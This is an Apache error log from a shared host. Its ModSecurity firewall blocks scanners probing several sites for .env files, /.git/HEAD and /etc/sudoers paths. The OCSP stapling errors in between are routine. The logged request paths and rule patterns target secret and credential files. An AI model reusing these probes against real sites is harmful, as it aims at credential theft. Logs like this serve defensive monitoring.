[Mon May 11 11:21:03.054363 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:28872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.example.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.example.tmp"] [unique_id "agGff0Rdw2n9wv6Ai4_-HAAAAIk"]
[Mon May 11 11:21:03.054647 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:28872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.example.tmp"] [unique_id "agGff0Rdw2n9wv6Ai4_-HAAAAIk"]
[Mon May 11 11:21:05.289714 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:28872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGff0Rdw2n9wv6Ai4_-HAAAAIk"]
[Mon May 11 11:21:05.315945 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:2506] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.local.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/lib/.env.local.dist"] [unique_id "agGfgURdw2n9wv6Ai4_-HwAAAJU"]
[Mon May 11 11:21:05.316167 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:2506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/lib/.env.local.dist"] [unique_id "agGfgURdw2n9wv6Ai4_-HwAAAJU"]
[Mon May 11 11:21:06.485750 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:2506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfgURdw2n9wv6Ai4_-HwAAAJU"]
[Mon May 11 11:21:06.511048 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:2540] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.local.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.local.dist"] [unique_id "agGfgkYQeUtAPynIs6xO2wAAAAU"]
[Mon May 11 11:21:06.511408 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:2540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.local.dist"] [unique_id "agGfgkYQeUtAPynIs6xO2wAAAAU"]
[Mon May 11 11:21:08.008928 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:2540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfgkYQeUtAPynIs6xO2wAAAAU"]
[Mon May 11 11:21:08.534967 2026] [ssl:error] [pid 1254328:tid 1254352] (EAI 2)Name or service not known: [client 209.38.197.168:40306] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:08.535013 2026] [ssl:error] [pid 1254328:tid 1254352] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:10.014500 2026] [ssl:error] [pid 1256241:tid 1256253] (EAI 2)Name or service not known: [client 161.123.122.177:43657] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:10.014528 2026] [ssl:error] [pid 1256241:tid 1256253] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:12.905124 2026] [ssl:error] [pid 1254179:tid 1254190] (EAI 2)Name or service not known: [client 124.68.54.231:46473] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:12.905216 2026] [ssl:error] [pid 1254179:tid 1254190] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:18.003891 2026] [ssl:error] [pid 1256241:tid 1256261] (EAI 2)Name or service not known: [client 134.209.193.60:35966] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:18.003925 2026] [ssl:error] [pid 1256241:tid 1256261] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:20.424325 2026] [security2:error] [pid 1254328:tid 1254350] [client 216.73.216.110:40379] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/sudoers found within ARGS:path: /etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGfkERdw2n9wv6Ai4_-MAAAAJQ"]
[Mon May 11 11:21:20.425196 2026] [security2:error] [pid 1254328:tid 1254350] [client 216.73.216.110:40379] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGfkERdw2n9wv6Ai4_-MAAAAJQ"]
[Mon May 11 11:21:20.516290 2026] [security2:error] [pid 1254328:tid 1254350] [client 216.73.216.110:40379] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfkERdw2n9wv6Ai4_-MAAAAJQ"]
[Mon May 11 11:21:21.324647 2026] [ssl:error] [pid 1254242:tid 1254268] (EAI 2)Name or service not known: [client 89.184.200.88:42443] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:21.324717 2026] [ssl:error] [pid 1254242:tid 1254268] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:22.505072 2026] [ssl:error] [pid 1254212:tid 1254219] (EAI 2)Name or service not known: [client 193.223.69.13:42831] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:22.505108 2026] [ssl:error] [pid 1254212:tid 1254219] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:23.524856 2026] [ssl:error] [pid 1254328:tid 1254340] (EAI 2)Name or service not known: [client 47.59.117.138:40697] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:23.524882 2026] [ssl:error] [pid 1254328:tid 1254340] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:24.276185 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:48352] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env.example-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/local/.env.example-backup"] [unique_id "agGflEYQeUtAPynIs6xO8AAAAAQ"]
[Mon May 11 11:21:24.276413 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:48352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/local/.env.example-backup"] [unique_id "agGflEYQeUtAPynIs6xO8AAAAAQ"]
[Mon May 11 11:21:26.873868 2026] [security2:error] [pid 1254212:tid 1254218] [client 185.177.72.9:48352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGflEYQeUtAPynIs6xO8AAAAAQ"]
[Mon May 11 11:21:26.902514 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:48358] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env.example-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/local/.env.example-backup"] [unique_id "agGflr4KNmD_mZ_vlf8vOQAAAFM"]
[Mon May 11 11:21:26.902729 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:48358] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/local/.env.example-backup"] [unique_id "agGflr4KNmD_mZ_vlf8vOQAAAFM"]
[Mon May 11 11:21:29.028246 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:48358] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGflr4KNmD_mZ_vlf8vOQAAAFM"]
[Mon May 11 11:21:29.054290 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:48372] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/local/.env_local"] [unique_id "agGfmURdw2n9wv6Ai4_-NAAAAI8"]
[Mon May 11 11:21:29.054515 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:48372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/local/.env_local"] [unique_id "agGfmURdw2n9wv6Ai4_-NAAAAI8"]
[Mon May 11 11:21:29.240296 2026] [ssl:error] [pid 1256241:tid 1256266] (EAI 2)Name or service not known: [client 140.82.33.224:58118] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:29.240329 2026] [ssl:error] [pid 1256241:tid 1256266] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:31.344536 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:48372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfmURdw2n9wv6Ai4_-NAAAAI8"]
[Mon May 11 11:21:31.371052 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:48388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/local/.env_local"] [unique_id "agGfm74KNmD_mZ_vlf8vRAAAAEA"]
[Mon May 11 11:21:31.371281 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:48388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/local/.env_local"] [unique_id "agGfm74KNmD_mZ_vlf8vRAAAAEA"]
[Mon May 11 11:21:31.622615 2026] [ssl:error] [pid 1256241:tid 1256254] (EAI 2)Name or service not known: [client 158.46.159.140:35501] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:31.622659 2026] [ssl:error] [pid 1256241:tid 1256254] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:33.449052 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:48388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfm74KNmD_mZ_vlf8vRAAAAEA"]
[Mon May 11 11:21:33.659442 2026] [ssl:error] [pid 1254133:tid 1254138] (EAI 2)Name or service not known: [client 103.154.64.180:57524] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:33.659470 2026] [ssl:error] [pid 1254133:tid 1254138] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:35.097385 2026] [security2:error] [pid 1254133:tid 1254144] [client 104.207.55.127:63839] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-de-mobilite-regional.com"] [uri "/.env"] [unique_id "agGfnxjZymfuKpjWXehyrgAAAMg"]
[Mon May 11 11:21:35.097621 2026] [security2:error] [pid 1254133:tid 1254144] [client 104.207.55.127:63839] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-de-mobilite-regional.com"] [uri "/.env"] [unique_id "agGfnxjZymfuKpjWXehyrgAAAMg"]
[Mon May 11 11:21:35.934466 2026] [security2:error] [pid 1254133:tid 1254148] [client 65.111.11.145:58851] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/.git/HEAD"] [unique_id "agGfnxjZymfuKpjWXehysAAAAMw"]
[Mon May 11 11:21:35.934702 2026] [security2:error] [pid 1254133:tid 1254148] [client 65.111.11.145:58851] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/.git/HEAD"] [unique_id "agGfnxjZymfuKpjWXehysAAAAMw"]
[Mon May 11 11:21:37.938864 2026] [security2:error] [pid 1254133:tid 1254144] [client 104.207.55.127:63839] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-de-mobilite-regional.com"] [uri "/index.php"] [unique_id "agGfnxjZymfuKpjWXehyrgAAAMg"]
[Mon May 11 11:21:38.340175 2026] [security2:error] [pid 1254133:tid 1254148] [client 65.111.11.145:58851] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agGfnxjZymfuKpjWXehysAAAAMw"]
[Mon May 11 11:21:40.179537 2026] [security2:error] [pid 1254133:tid 1254151] [client 216.26.255.111:12733] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pole-mobilite-regional.com"] [uri "/.env"] [unique_id "agGfpBjZymfuKpjWXehytgAAAM8"]
[Mon May 11 11:21:40.179756 2026] [security2:error] [pid 1254133:tid 1254151] [client 216.26.255.111:12733] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pole-mobilite-regional.com"] [uri "/.env"] [unique_id "agGfpBjZymfuKpjWXehytgAAAM8"]
[Mon May 11 11:21:42.159538 2026] [security2:error] [pid 1254133:tid 1254151] [client 216.26.255.111:12733] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "pole-mobilite-regional.com"] [uri "/index.php"] [unique_id "agGfpBjZymfuKpjWXehytgAAAM8"]
[Mon May 11 11:21:48.525787 2026] [ssl:error] [pid 1254242:tid 1254261] (EAI 2)Name or service not known: [client 185.20.19.118:58866] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:48.525817 2026] [ssl:error] [pid 1254242:tid 1254261] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:48.924302 2026] [ssl:error] [pid 1254212:tid 1254233] (EAI 2)Name or service not known: [client 185.20.19.118:52834] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:48.924359 2026] [ssl:error] [pid 1254212:tid 1254233] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:49.376486 2026] [ssl:error] [pid 1254133:tid 1254141] (EAI 2)Name or service not known: [client 185.20.19.118:58914] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:21:49.376509 2026] [ssl:error] [pid 1254133:tid 1254141] AH01941: stapling_renew_response: responder error
